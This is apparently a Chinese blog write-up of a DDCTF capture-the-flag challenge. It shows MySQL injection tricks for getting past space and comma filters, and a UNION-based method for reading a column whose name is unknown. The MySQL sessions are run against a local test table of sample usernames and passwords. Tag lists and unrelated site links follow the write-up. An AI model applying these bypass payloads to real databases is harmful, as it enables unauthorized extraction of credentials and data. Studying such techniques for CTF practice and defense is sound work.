前言

本文介绍的是DDCTF第五题，绕过未知字段名的技巧，这里拿本机来操作了下，思路很棒也很清晰，分享给大家，下面来看看详细的介绍：

实现思路

题目过滤空格和逗号，空格使用%0a，%0b，%0c，%0d，%a0，或者直接使用括号都可以绕过，逗号使用join绕过；

存放flag的字段名未知，information_schema.columns也将表名的hex过滤了，即获取不到字段名；这时可以利用联合查询，过程如下：

思想就是获取flag，让其在已知字段名下出现；

示例代码：

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | password | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110.com |
| 120@120.com | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

总结

以上就是这篇文章的全部内容了，希望本文的内容对大家的学习或者工作能带来一定的帮助，如果有疑问大家可以留言交流，谢谢大家对的支持。

# mysql注入绕过  # mysql  # 过滤逗号  # 过滤空格  # 防止xss和sql注入:JS特殊字符过滤正则  # 一个过滤重复数据的 SQL 语句  # MySQL注入绕开过滤的技巧总结  # SQL注入中绕过 单引号 限制继续注入  # SQL注入绕过的技巧总结  # 多列复合索引的使用 绕过微软sql server的一个缺陷  # 关于SQL注入绕过的一些知识点  # SQL Server简单模式下误删除堆表记录恢复方法(绕过页眉校验)  # SQL注入技巧之显注与盲注中过滤逗号绕过详析  # 字段名  # 的是  # 作了  # 也很  # 也将  # 给大家  # 来看看  # 这篇文章  # 谢谢大家  # 本机  # 可以利用  # 很棒  # 让其  # 有疑问  # hex  # class  # pre  # sql  # gt 

相关栏目： 【 网站优化151355 】 【 网络推广146373 】 【 网络技术251813 】 【 AI营销90571 】

相关推荐： 开心动漫网站制作软件下载,十分开心动画为何停播？  Laravel中的Facade(门面)到底是什么原理  常州企业网站制作公司,全国继续教育网怎么登录？  移动端脚本框架Hammer.js  如何快速完成中国万网建站详细流程？  Laravel的契約(Contracts)是什么_深入理解Laravel Contracts与依赖倒置  Laravel Pest测试框架怎么用_从PHPUnit转向Pest的Laravel测试教程  JS经典正则表达式笔试题汇总  怎么制作一个起泡网,水泡粪全漏粪育肥舍冬季氨气超过25ppm，可以有哪些措施降低舍内氨气水平？  网站制作公司哪里好做,成都网站制作公司哪家做得比较好，更正规？  Windows10怎样连接蓝牙设备_Windows10蓝牙连接步骤【教程】  Laravel项目结构怎么组织_大型Laravel应用的最佳目录结构实践  香港服务器网站搭建教程-电商部署、配置优化与安全稳定指南  Laravel怎么实现前端Toast弹窗提示_Laravel Session闪存数据Flash传递给前端【方法】  重庆市网站制作公司,重庆招聘网站哪个好？  如何彻底卸载建站之星软件？  如何快速打造个性化非模板自助建站？  如何选择可靠的免备案建站服务器？  laravel怎么实现图片的压缩和裁剪_laravel图片压缩与裁剪方法  如何快速查询网址的建站时间与历史轨迹？  如何在香港免费服务器上快速搭建网站？  js代码实现下拉菜单【推荐】  Win11搜索不到蓝牙耳机怎么办 Win11蓝牙驱动更新修复【详解】  七夕网站制作视频,七夕大促活动怎么报名？  Laravel怎么清理缓存_Laravel optimize clear命令详解  Laravel怎么写单元测试_PHPUnit在Laravel项目中的基础测试入门  PHP怎么接收前端传的文件路径_处理文件路径参数接收方法【汇总】  实例解析angularjs的filter过滤器  Bootstrap CSS布局之列表  Laravel怎么做数据加密_Laravel内置Crypt门面的加密与解密功能  php8.4header发送头信息失败怎么办_php8.4header函数问题解决【解答】  免费网站制作appp,免费制作app哪个平台好？  千库网官网入口推荐 千库网设计创意平台入口  Laravel API路由如何设计_Laravel构建RESTful API的路由最佳实践  Laravel Vite是做什么的_Laravel前端资源打包工具Vite配置与使用  网站制作软件免费下载安装,有哪些免费下载的软件网站？  Laravel Telescope怎么调试_使用Laravel Telescope进行应用监控与调试  软银砸40亿美元收购DigitalBridge 强化AI资料中心布局  js实现获取鼠标当前的位置  教你用AI将一段旋律扩展成一首完整的曲子  HTML5空格在Angular项目里怎么处理_Angular中空格的渲染问题【详解】  如何在香港服务器上快速搭建免备案网站？  如何用AWS免费套餐快速搭建高效网站？  Laravel如何记录日志_Laravel Logging系统配置与自定义日志通道  网页制作模板网站推荐,网页设计海报之类的素材哪里好？  Laravel如何处理跨站请求伪造（CSRF）保护_Laravel表单安全机制与令牌校验  Laravel如何实现事件和监听器？（Event & Listener实战）  Laravel怎么实现模型属性的自动加密  做企业网站制作流程,企业网站制作基本流程有哪些？  LinuxShell函数封装方法_脚本复用设计思路【教程】